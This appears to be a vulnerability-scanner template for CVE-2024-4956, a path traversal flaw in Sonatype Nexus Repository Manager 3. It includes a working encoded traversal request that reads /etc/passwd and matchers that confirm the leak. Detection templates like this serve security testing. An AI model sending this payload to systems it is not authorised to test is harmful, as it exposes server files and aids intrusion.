id: CVE-2024-4956

info:
  name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
  reference:
    - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4956
    - https://support.sonatype.com/hc/en-us/articles/29416509323923
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4956
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.10128
    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sonatype
    product: nexus
    fofa-query: title="Nexus Repository Manager"
  tags: cve,cve2024,nexus,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100f3fc0d77fbae2962a5f1baf5b9986fc4abe4ea968b3898fec35782a662cb3fbf022020a1ce16cea9d0dcfd42f0b7fe6550ada932bec3e3c8e4774c9254046ac4dfa1:922c64590222798bb761d5b6d8e72950